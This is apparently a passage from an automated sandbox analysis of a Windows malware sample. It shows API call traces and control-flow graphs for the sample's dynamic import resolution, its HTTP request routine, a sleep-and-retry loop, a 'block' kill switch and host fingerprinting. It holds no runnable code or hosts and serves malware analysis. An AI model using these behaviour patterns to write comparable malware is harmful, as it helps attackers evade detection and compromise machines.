                          • GetProcAddress.KERNEL32(74DD0000,0189D140), ref: 00CC9E8D
                          • GetProcAddress.KERNEL32(74DD0000,0189D0F8), ref: 00CC9EA6
                          • GetProcAddress.KERNEL32(74DD0000,0189D218), ref: 00CC9EBE
                          • GetProcAddress.KERNEL32(74DD0000,0189D278), ref: 00CC9ED6
                          • GetProcAddress.KERNEL32(74DD0000,0189CFC0), ref: 00CC9EEF
                          • GetProcAddress.KERNEL32(74DD0000,0189D038), ref: 00CC9F07
                          • GetProcAddress.KERNEL32(74DD0000,0189D110), ref: 00CC9F1F
                          • GetProcAddress.KERNEL32(74DD0000,0189D050), ref: 00CC9F38
                          • GetProcAddress.KERNEL32(74DD0000,01899388), ref: 00CC9F50
                          • GetProcAddress.KERNEL32(74DD0000,0189CFD8), ref: 00CC9F68
                          • GetProcAddress.KERNEL32(74DD0000,0189D1B8), ref: 00CC9F81
                          • GetProcAddress.KERNEL32(74DD0000,01885610), ref: 00CC9F99
                          • GetProcAddress.KERNEL32(74DD0000,0189D128), ref: 00CC9FB1
                          • GetProcAddress.KERNEL32(74DD0000,01885630), ref: 00CC9FCA
                          • GetProcAddress.KERNEL32(74DD0000,0189CFF0), ref: 00CC9FE2
                          • GetProcAddress.KERNEL32(74DD0000,0189D068), ref: 00CC9FFA
                          • GetProcAddress.KERNEL32(74DD0000,01885650), ref: 00CCA013
                          • GetProcAddress.KERNEL32(74DD0000,018856D0), ref: 00CCA02B
                          • LoadLibraryA.KERNEL32(0189D290,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA03D
                          • LoadLibraryA.KERNEL32(0189D170,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA04E
                          • LoadLibraryA.KERNEL32(0189D188,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA060
                          • LoadLibraryA.KERNEL32(0189D080,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA072
                          • LoadLibraryA.KERNEL32(0189D098,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA083
                          • LoadLibraryA.KERNEL32(0189D158,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA095
                          • LoadLibraryA.KERNEL32(0189D0B0,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA0A7
                          • LoadLibraryA.KERNEL32(0189D1A0,?,00CC5CA3,00CD0AEB,?,?,?,?,?,?,?,?,?,?,00CD0AEA,00CD0AE3), ref: 00CCA0B8
                          • GetProcAddress.KERNEL32(75290000,018859B0), ref: 00CCA0DA
                          • GetProcAddress.KERNEL32(75290000,0189D398), ref: 00CCA0F2
                          • GetProcAddress.KERNEL32(75290000,01899B70), ref: 00CCA10A
                          • GetProcAddress.KERNEL32(75290000,0189D320), ref: 00CCA123
                          • GetProcAddress.KERNEL32(75290000,01885770), ref: 00CCA13B
                          • GetProcAddress.KERNEL32(734C0000,0188B608), ref: 00CCA160
                          • GetProcAddress.KERNEL32(734C0000,01885710), ref: 00CCA179
                          • GetProcAddress.KERNEL32(734C0000,0188B630), ref: 00CCA191
                          • GetProcAddress.KERNEL32(734C0000,0189D368), ref: 00CCA1A9
                          • GetProcAddress.KERNEL32(734C0000,0189D338), ref: 00CCA1C2
                          • GetProcAddress.KERNEL32(734C0000,01885A10), ref: 00CCA1DA
                          • GetProcAddress.KERNEL32(734C0000,018857F0), ref: 00CCA1F2
                          • GetProcAddress.KERNEL32(734C0000,0189D350), ref: 00CCA20B
                          • GetProcAddress.KERNEL32(752C0000,01885950), ref: 00CCA22C
                          • GetProcAddress.KERNEL32(752C0000,01885830), ref: 00CCA244
                          • GetProcAddress.KERNEL32(752C0000,0189D380), ref: 00CCA25D
                          • GetProcAddress.KERNEL32(752C0000,0189D3B0), ref: 00CCA275
                          • GetProcAddress.KERNEL32(752C0000,018858F0), ref: 00CCA28D
                          • GetProcAddress.KERNEL32(74EC0000,0188B798), ref: 00CCA2B3
                          • GetProcAddress.KERNEL32(74EC0000,0188B658), ref: 00CCA2CB
                          • GetProcAddress.KERNEL32(74EC0000,0189D2F0), ref: 00CCA2E3
                          • GetProcAddress.KERNEL32(74EC0000,01885790), ref: 00CCA2FC
                          • GetProcAddress.KERNEL32(74EC0000,018857B0), ref: 00CCA314
                          • GetProcAddress.KERNEL32(74EC0000,0188B6A8), ref: 00CCA32C
                          • GetProcAddress.KERNEL32(75BD0000,0189D308), ref: 00CCA352
                          • GetProcAddress.KERNEL32(75BD0000,01885970), ref: 00CCA36A
                          • GetProcAddress.KERNEL32(75BD0000,01899B50), ref: 00CCA382
                          • GetProcAddress.KERNEL32(75BD0000,0189D3E0), ref: 00CCA39B
                          • GetProcAddress.KERNEL32(75BD0000,0189D3C8), ref: 00CCA3B3
                          • GetProcAddress.KERNEL32(75BD0000,01885A30), ref: 00CCA3CB
                          • GetProcAddress.KERNEL32(75BD0000,01885990), ref: 00CCA3E4
                          • GetProcAddress.KERNEL32(75BD0000,0189D3F8), ref: 00CCA3FC
                          • GetProcAddress.KERNEL32(75BD0000,0189D410), ref: 00CCA414
                          • GetProcAddress.KERNEL32(75A70000,018856B0), ref: 00CCA436
                          • GetProcAddress.KERNEL32(75A70000,0189D440), ref: 00CCA44E
                          • GetProcAddress.KERNEL32(75A70000,0189D428), ref: 00CCA466
                          • GetProcAddress.KERNEL32(75A70000,0189D458), ref: 00CCA47F
                          • GetProcAddress.KERNEL32(75A70000,0189D470), ref: 00CCA497
                          • GetProcAddress.KERNEL32(75450000,01885810), ref: 00CCA4B8
                          • GetProcAddress.KERNEL32(75450000,018857D0), ref: 00CCA4D1
                          • GetProcAddress.KERNEL32(75DA0000,01885A50), ref: 00CCA4F2
                          • GetProcAddress.KERNEL32(75DA0000,0189D2C0), ref: 00CCA50A
                          • GetProcAddress.KERNEL32(6F070000,01885850), ref: 00CCA530
                          • GetProcAddress.KERNEL32(6F070000,018856F0), ref: 00CCA548
                          • GetProcAddress.KERNEL32(6F070000,018858B0), ref: 00CCA560
                          • GetProcAddress.KERNEL32(6F070000,0189D2D8), ref: 00CCA579
                          • GetProcAddress.KERNEL32(6F070000,018859D0), ref: 00CCA591
                          • GetProcAddress.KERNEL32(6F070000,01885910), ref: 00CCA5A9
                          • GetProcAddress.KERNEL32(6F070000,01885730), ref: 00CCA5C2
                          • GetProcAddress.KERNEL32(6F070000,01885750), ref: 00CCA5DA
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00CCA5F1
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00CCA607
                          • GetProcAddress.KERNEL32(75AF0000,0189CD98), ref: 00CCA629
                          • GetProcAddress.KERNEL32(75AF0000,01899AF0), ref: 00CCA641
                          • GetProcAddress.KERNEL32(75AF0000,0189CF18), ref: 00CCA659
                          • GetProcAddress.KERNEL32(75AF0000,0189CDF8), ref: 00CCA672
                          • GetProcAddress.KERNEL32(75D90000,01885870), ref: 00CCA693
                          • GetProcAddress.KERNEL32(6CFB0000,0189CE28), ref: 00CCA6B4
                          • GetProcAddress.KERNEL32(6CFB0000,01885890), ref: 00CCA6CD
                          • GetProcAddress.KERNEL32(6CFB0000,0189CCC0), ref: 00CCA6E5
                          • GetProcAddress.KERNEL32(6CFB0000,0189CE88), ref: 00CCA6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 8bef7b9cf247ecd4bcad2c2054ec8c45a4d78fb398fdc418c38bad66ce30e3f5
                          • Instruction ID: 1cafc78502f8f0061d468cd7b666a3e98d42a4fb10e2cdf2105a5e27944a7480
                          • Opcode Fuzzy Hash: 8bef7b9cf247ecd4bcad2c2054ec8c45a4d78fb398fdc418c38bad66ce30e3f5
                          • Instruction Fuzzy Hash: 14624DF55002419FC348EFABED88D7637F9E7CC24170C857AA60DEB2A4D679A449CB12
                          Function 00CB6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 cb6280-cb630b call cca7a0 call cb47b0 call cca740 InternetOpenA StrCmpCA 1040 cb630d 1033->1040 1041 cb6314-cb6318 1033->1041 1040->1041 1042 cb6509-cb6525 call cca7a0 call cca800 * 2 1041->1042 1043 cb631e-cb6342 InternetConnectA 1041->1043 1062 cb6528-cb652d 1042->1062 1045 cb6348-cb634c 1043->1045 1046 cb64ff-cb6503 InternetCloseHandle 1043->1046 1047 cb635a 1045->1047 1048 cb634e-cb6358 1045->1048 1046->1042 1050 cb6364-cb6392 HttpOpenRequestA 1047->1050 1048->1050 1052 cb6398-cb639c 1050->1052 1053 cb64f5-cb64f9 InternetCloseHandle 1050->1053 1055 cb639e-cb63bf InternetSetOptionA 1052->1055 1056 cb63c5-cb6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 cb642c-cb644b call cc8940 1056->1058 1059 cb6407-cb6427 call cca740 call cca800 * 2 1056->1059 1066 cb64c9-cb64e9 call cca740 call cca800 * 2 1058->1066 1067 cb644d-cb6454 1058->1067 1059->1062 1066->1062 1069 cb64c7-cb64ef InternetCloseHandle 1067->1069 1070 cb6456-cb6480 InternetReadFile 1067->1070 1069->1053 1073 cb648b 1070->1073 1074 cb6482-cb6489 1070->1074 1073->1069 1074->1073 1078 cb648d-cb64c5 call cca9b0 call cca8a0 call cca800 1074->1078 1078->1070
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • InternetOpenA.WININET(00CD0DFE,00000001,00000000,00000000,00000000), ref: 00CB62E1
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CB63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00CB63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CB646D
                          • InternetCloseHandle.WININET(00000000), ref: 00CB64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00CB64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00CB6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 96655a8dea1ccd763298a88fa20c6d6ed9c4569e47099239f858a850eff807ac
                          • Instruction ID: fc600a0cd2f59b83bbc37350c6bf2a5b7421b2da7e985e27795b9ce70849cb61
                          • Opcode Fuzzy Hash: 96655a8dea1ccd763298a88fa20c6d6ed9c4569e47099239f858a850eff807ac
                          • Instruction Fuzzy Hash: 75711D71A00218AFDB24DFA1DC49FEE77B8BB44704F1081A9F50A6B1D0DBB46A89DF51
                          Function 00CC5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 cc5510-cc5577 call cc5ad0 call cca820 * 3 call cca740 * 4 1106 cc557c-cc5583 1090->1106 1107 cc5585-cc55b6 call cca820 call cca7a0 call cb1590 call cc51f0 1106->1107 1108 cc55d7-cc564c call cca740 * 2 call cb1590 call cc52c0 call cca8a0 call cca800 call ccaad0 StrCmpCA 1106->1108 1124 cc55bb-cc55d2 call cca8a0 call cca800 1107->1124 1134 cc5693-cc56a9 call ccaad0 StrCmpCA 1108->1134 1138 cc564e-cc568e call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1108->1138 1124->1134 1139 cc57dc-cc5844 call cca8a0 call cca820 * 2 call cb1670 call cca800 * 4 call cc6560 call cb1550 1134->1139 1140 cc56af-cc56b6 1134->1140 1138->1134 1270 cc5ac3-cc5ac6 1139->1270 1143 cc56bc-cc56c3 1140->1143 1144 cc57da-cc585f call ccaad0 StrCmpCA 1140->1144 1149 cc571e-cc5793 call cca740 * 2 call cb1590 call cc52c0 call cca8a0 call cca800 call ccaad0 StrCmpCA 1143->1149 1150 cc56c5-cc5719 call cca820 call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1143->1150 1163 cc5865-cc586c 1144->1163 1164 cc5991-cc59f9 call cca8a0 call cca820 * 2 call cb1670 call cca800 * 4 call cc6560 call cb1550 1144->1164 1149->1144 1250 cc5795-cc57d5 call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1149->1250 1150->1144 1171 cc598f-cc5a14 call ccaad0 StrCmpCA 1163->1171 1172 cc5872-cc5879 1163->1172 1164->1270 1201 cc5a28-cc5a91 call cca8a0 call cca820 * 2 call cb1670 call cca800 * 4 call cc6560 call cb1550 1171->1201 1202 cc5a16-cc5a21 Sleep 1171->1202 1179 cc587b-cc58ce call cca820 call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1172->1179 1180 cc58d3-cc5948 call cca740 * 2 call cb1590 call cc52c0 call cca8a0 call cca800 call ccaad0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 cc594a-cc598a call cca7a0 call cb1590 call cc51f0 call cca8a0 call cca800 1180->1275 1201->1270 1202->1106 1250->1144 1275->1171
                          APIs
                            • Part of subcall function 00CCA820: lstrlen.KERNEL32(00CB4F05,?,?,00CB4F05,00CD0DDE), ref: 00CCA82B
                            • Part of subcall function 00CCA820: lstrcpy.KERNEL32(00CD0DDE,00000000), ref: 00CCA885
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC56A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5857
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5228
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5318
                            • Part of subcall function 00CC52C0: lstrlen.KERNEL32(00000000), ref: 00CC532F
                            • Part of subcall function 00CC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00CC5364
                            • Part of subcall function 00CC52C0: lstrlen.KERNEL32(00000000), ref: 00CC5383
                            • Part of subcall function 00CC52C0: lstrlen.KERNEL32(00000000), ref: 00CC53AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CC5A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00CC5A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 83c3ebe502238b1f1e7e0c03d6e7c9b963e2dcf86bae250119611e04b986b831
                          • Instruction ID: 20d577a23a9fbe537992d34940543dd899ec6389edd7b2ed007479c19d04592b
                          • Opcode Fuzzy Hash: 83c3ebe502238b1f1e7e0c03d6e7c9b963e2dcf86bae250119611e04b986b831
                          • Instruction Fuzzy Hash: E8E11D71910108ABCB14FBA1DC9AFFD7378AB94304F54816CF50666191EF346E4EEBA2
                          Function 00CC17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 cc17a0-cc17cd call ccaad0 StrCmpCA 1304 cc17cf-cc17d1 ExitProcess 1301->1304 1305 cc17d7-cc17f1 call ccaad0 1301->1305 1309 cc17f4-cc17f8 1305->1309 1310 cc17fe-cc1811 1309->1310 1311 cc19c2-cc19cd call cca800 1309->1311 1313 cc199e-cc19bd 1310->1313 1314 cc1817-cc181a 1310->1314 1313->1309 1316 cc18ad-cc18be StrCmpCA 1314->1316 1317 cc18cf-cc18e0 StrCmpCA 1314->1317 1318 cc198f-cc1999 call cca820 1314->1318 1319 cc1849-cc1858 call cca820 1314->1319 1320 cc1821-cc1830 call cca820 1314->1320 1321 cc185d-cc186e StrCmpCA 1314->1321 1322 cc187f-cc1890 StrCmpCA 1314->1322 1323 cc1835-cc1844 call cca820 1314->1323 1324 cc1970-cc1981 StrCmpCA 1314->1324 1325 cc18f1-cc1902 StrCmpCA 1314->1325 1326 cc1951-cc1962 StrCmpCA 1314->1326 1327 cc1932-cc1943 StrCmpCA 1314->1327 1328 cc1913-cc1924 StrCmpCA 1314->1328 1339 cc18ca 1316->1339 1340 cc18c0-cc18c3 1316->1340 1341 cc18ec 1317->1341 1342 cc18e2-cc18e5 1317->1342 1318->1313 1319->1313 1320->1313 1335 cc187a 1321->1335 1336 cc1870-cc1873 1321->1336 1337 cc189e-cc18a1 1322->1337 1338 cc1892-cc189c 1322->1338 1323->1313 1329 cc198d 1324->1329 1330 cc1983-cc1986 1324->1330 1343 cc190e 1325->1343 1344 cc1904-cc1907 1325->1344 1349 cc196e 1326->1349 1350 cc1964-cc1967 1326->1350 1347 cc194f 1327->1347 1348 cc1945-cc1948 1327->1348 1345 cc1926-cc1929 1328->1345 1346 cc1930 1328->1346 1329->1313 1330->1329 1335->1313 1336->1335 1355 cc18a8 1337->1355 1338->1355 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1346 1346->1313 1347->1313 1348->1347 1349->1313 1350->1349 1355->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00CC17C5
                          • ExitProcess.KERNEL32 ref: 00CC17D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 003fb3a971c3bf6a8057fa6a6aa7361b950221379e6ce3a7f66e3524eef0b63c
                          • Instruction ID: 47d7e907cb2cc070a243e7051464beb162b1e93bdb3854e79790cf2ceec98718
                          • Opcode Fuzzy Hash: 003fb3a971c3bf6a8057fa6a6aa7361b950221379e6ce3a7f66e3524eef0b63c
                          • Instruction Fuzzy Hash: 7C517BB4A04209EFCB04DFA6C958FBE77B5AF45704F18805DE80AAB241D770EA45DB62
                          Function 00CC7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 cc7500-cc754a GetWindowsDirectoryA 1357 cc754c 1356->1357 1358 cc7553-cc75c7 GetVolumeInformationA call cc8d00 * 3 1356->1358 1357->1358 1365 cc75d8-cc75df 1358->1365 1366 cc75fc-cc7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 cc75e1-cc75fa call cc8d00 1365->1367 1369 cc7628-cc7658 wsprintfA call cca740 1366->1369 1370 cc7619-cc7626 call cca740 1366->1370 1367->1365 1377 cc767e-cc768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CC7542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC760A
                          • wsprintfA.USER32 ref: 00CC7640
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
